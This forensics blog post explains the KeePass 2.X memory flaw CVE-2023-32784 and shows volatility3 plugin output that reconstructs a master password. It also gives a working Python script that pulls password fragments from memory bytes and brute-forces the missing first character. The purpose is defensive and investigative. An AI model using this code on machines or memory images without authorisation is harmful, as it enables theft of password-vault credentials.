📦 Volatility3 Windows Plugin : KeePass

On May 1st, 2023, vdohney raised concerns about a flaw he found impacting KeePass 2.X. vdohney claimed to be able to reconstruct the master password from memory. The researcher later released a proof of concept (PoC), in .NET and also in Python.

In this blog post we will describe the vulnerability and see how we can create a volatility3 plugin to help forensic investigators retrieve passwords from memory.

The vulnerability (CVE-2023-32784, fixed in KeePass 2.54) resides in the standard KeePass 2.X version, which is written in .NET. This version uses its own custom text box, SecureTextBoxEx, not only for the master password entry dialog but also in other parts of the program, such as password edit boxes. The flaw only concerns characters typed into this text box: it does not cover the scenario where the master password was pasted from the clipboard (which is bad practice anyway and is not how most users enter it). When a password is typed, the text box leaves leftover strings in memory: for each keystroke, a string made of the masking character "●" repeated once per previously typed character, followed by the newly typed character, stays behind. For example, when "Hello" is typed, the strings "●e", "●●l", "●●●l" and "●●●●o" remain present in memory. The first character is never part of such a string. From this observation, vdohney built a method to recover that scattered information from memory. More details about this vulnerability can be found on vdohney's GitHub.

As a forensic investigator, you might have current (or past) cases where a memory image was captured while a KeePass 2.X process was running. Using volatility3, it is possible to list the running processes with the "pslist" or "psscan" plugin.

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.pslist
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

4	0	System	0x9908d5a87040	136	-	N/A	False	2023-05-19 14:20:08.000000 	N/A	Disabled
108	4	Registry	0x9908d5af6080	4	-	N/A	False	2023-05-19 14:20:04.000000 	N/A	Disabled
412	4	smss.exe	0x9908dabd8040	2	-	N/A	False	2023-05-19 14:20:08.000000 	N/A	Disabled
532	516	csrss.exe	0x9908dac800c0	11	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
628	516	wininit.exe	0x9908db831080	3	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
648	620	csrss.exe	0x9908db847140	13	-	1	False	2023-05-19 14:20:32.000000 	N/A	Disabled
700	628	services.exe	0x9908db894080	7	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
740	620	winlogon.exe	0x9908db8a4080	3	-	1	False	2023-05-19 14:20:32.000000 	N/A	Disabled
796	628	lsass.exe	0x9908db8c8080	6	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
912	700	svchost.exe	0x9908db936240	13	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
1716	912	dllhost.exe	0x9908de764080	5	-	1	False	2023-05-19 14:23:07.000000 	N/A	Disabled
4888	700	SgrmBroker.exe	0x9908df512080	7	-	0	False	2023-05-19 14:23:08.000000 	N/A	Disabled
7820	912	WmiPrvSE.exe	0x9908da4f7080	4	-	0	False	2023-05-19 14:23:26.000000 	N/A	Disabled
4272	4528	FTK Imager.exe	0x9908da509080	12	-	1	False	2023-05-19 14:23:42.000000 	N/A	Disabled
4100	700	WUDFHost.exe	0x9908de9a3080	5	-	0	False	2023-05-19 14:23:43.000000 	N/A	Disabled
2868	912	ShellExperienc	0x9908dec2c080	9	-	1	False	2023-05-19 14:23:45.000000 	N/A	Disabled
7684	912	RuntimeBroker.	0x9908d7f0d2c0	3	-	1	False	2023-05-19 14:23:46.000000 	N/A	Disabled
752	4528	KeePass.exe	0x9908da51b300	4	-	1	False	2023-05-19 14:25:34.000000 	N/A	Disabled
6344	700	svchost.exe	0x9908dd88a080	5	-	0	False	2023-05-19 14:25:49.000000 	N/A	Disabled

In this example we can see that a KeePass process was running on the host machine, with PID 752. Using volatility3, one can build the memory layer of this process (its virtual address space) and enumerate the regions mapped in it. Once this is done, one can resolve the virtual pages to physical pages and read the data residing there.

A custom plugin then parses that data to isolate the relevant pattern (in this case, runs of "●" followed by a single character) and attempts to reconstruct the master KeePass password entered by the user. The plugin can be found here: https://github.com/forensicxlab/volatility3_plugins/blob/main/keepass.py

By passing the PID of the process to the volatility3 KeePass plugin, one can try to reconstruct the master password:

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.keepass --pid 752
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished
Offset	Size	Constructed_Password

0x3ba6000	0x1000	u
0x3ba7000	0x1000	up
0x3ba7000	0x1000	upe
0x3ba8000	0x1000	uper
0x3ba9000	0x1000	uperM
0x3ba9000	0x1000	uperMa
0x3baa000	0x1000	uperMa
0x3baa000	0x1000	uperMas
0x3bab000	0x1000	uperMast
0x3bab000	0x1000	uperMaste
0x3bac000	0x1000	uperMaste
0x3bac000	0x1000	uperMaster
0x3bad000	0x7000	uperMasterP
0x3bad000	0x7000	uperMasterPa
0x3bad000	0x7000	uperMasterPas
0x3bad000	0x7000	uperMasterPass
0x3bad000	0x7000	uperMasterPassw
0x3bad000	0x7000	uperMasterPasswo
0x3bad000	0x7000	uperMasterPasswor
0x3bad000	0x7000	uperMasterPassword
0x7ffbf8ac5000	0x1000	uperMasterPassword
0x96e545bd2000	0x1000	{u,,}perMasterPassword
0xc58000400000	0x200000	{u,&,o}perMasterPassword
0xf80564600000	0x1200000	{u,&,,,J}perMasterPassword
0xf805737d3000	0x1f000	{u,&,,,o, }perMasterPassword

Even though the first character of the password is not stored in memory, it can easily be brute-forced, since only that one position remains unknown.
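The reconstruction logic described above (the "●…●x" residue left by SecureTextBoxEx and the brute force of the missing first character), as an added stand-alone example written for this article; it is not the code of the volatility3 plugin nor of vdohney's PoC. It scans a raw byte buffer for the UTF-16LE residue, builds one set of candidate characters per position, renders the result in the same "{a,b}" notation as the plugin output, and enumerates full password candidates for the positions the residue does not reveal. The buffer it scans is a constructed sample that emulates the residue of typing "Hello" (it is not a real memory image), and the helper names and the printable-ASCII alphabet are this example's own choices.

```python
import re
import string
from collections import defaultdict
from itertools import product

# U+25CF BLACK CIRCLE is the masking character SecureTextBoxEx uses.
# .NET strings live in memory as UTF-16LE, so each dot is the byte pair CF 25.
DOT_UTF16 = "\u25cf".encode("utf-16-le")          # b"\xcf\x25"

# A leftover fragment is N>=1 dots followed by exactly one revealed character.
# Only printable ASCII (low byte 0x20-0x7E, high byte 0x00) is accepted as the
# revealed code unit here; widen the class for non-ASCII passwords.
FRAGMENT = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e]\x00)")

# Alphabet used to brute-force positions the memory residue does not reveal
# (95 printable ASCII characters; an assumption of this example).
PRINTABLE = string.digits + string.ascii_letters + string.punctuation + " "


def find_fragments(data: bytes):
    """Yield (index, char) for every '●…●x' residue found in data.
    The number of dots equals the 0-based index of the revealed character,
    so '●●l' means 'l' was the third character typed."""
    for m in FRAGMENT.finditer(data):
        n_dots = len(m.group(1)) // len(DOT_UTF16)
        yield n_dots, m.group(2).decode("utf-16-le")


def candidate_table(data: bytes) -> list:
    """Collapse fragments into one set of candidate characters per index.
    Index 0 is always empty: the first keystroke is never followed by a dot,
    so this flaw never leaks it. Several candidates at one index mean the
    password was typed more than once (e.g. a typo, then a retype) or that
    another SecureTextBoxEx in KeePass received input."""
    seen = defaultdict(set)
    for idx, ch in find_fragments(data):
        seen[idx].add(ch)
    if not seen:
        return []
    return [set(seen.get(i, ())) for i in range(max(seen) + 1)]


def format_candidates(table) -> str:
    """Render the table the way the plugin output reads: '?' for unknown,
    a bare character when unambiguous, '{a,b}' when several were observed."""
    out = []
    for cands in table:
        if not cands:
            out.append("?")
        elif len(cands) == 1:
            out.append(next(iter(cands)))
        else:
            out.append("{" + ",".join(sorted(cands)) + "}")
    return "".join(out)


def expand_candidates(table, alphabet=PRINTABLE):
    """Enumerate full password candidates: unknown positions (index 0 and any
    gap) take the whole alphabet, ambiguous positions take their observed set."""
    choices = [sorted(c) if c else list(alphabet) for c in table]
    for combo in product(*choices):
        yield "".join(combo)


def build_sample_dump(password: str, filler: bytes = b"\x00" * 24) -> bytes:
    """Constructed sample input, NOT a real KeePass dump: emulate the residue
    left after `password` is typed key by key ('●e', '●●l', '●●●l', '●●●●o'
    for 'Hello'), scattered between filler bytes like heap garbage."""
    chunks = []
    for i in range(1, len(password)):
        frag = ("\u25cf" * i + password[i]).encode("utf-16-le")
        chunks.append(filler + frag + filler)
    return b"".join(chunks)


if __name__ == "__main__":
    dump = build_sample_dump("Hello")
    table = candidate_table(dump)
    print(format_candidates(table))                   # ?ello
    print(sum(1 for _ in expand_candidates(table)))   # 95
```

In practice the bytes fed to candidate_table come from the process memory layer that the plugin reads; the regex works on raw bytes, so it can be applied page by page or to a whole dump. When a position has several observed characters, as in the last lines of the plugin output above, the candidate set is kept instead of guessing, and expand_candidates turns those sets plus the unknown first character into the short list a practitioner would test against the database.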

To conclude this article, we demonstrated that the reconstruction of a KeePass master password can be implemented in the volatility3 framework via a custom plugin. The discovery of new memory extraction techniques is helping the field of digital forensics, and especially law enforcement agencies, which are now able to access the memory of devices in a more efficient and non-destructive way. This methodology could be valuable in solving actual incident cases, including past ones where the memory was captured and stored and the KeePass master password remained unbroken.

This plugin was tested on a Windows 10 22H2 memory image. Do not hesitate to reach out to me at felix.guyard@forensicxlab.com to enhance this article.

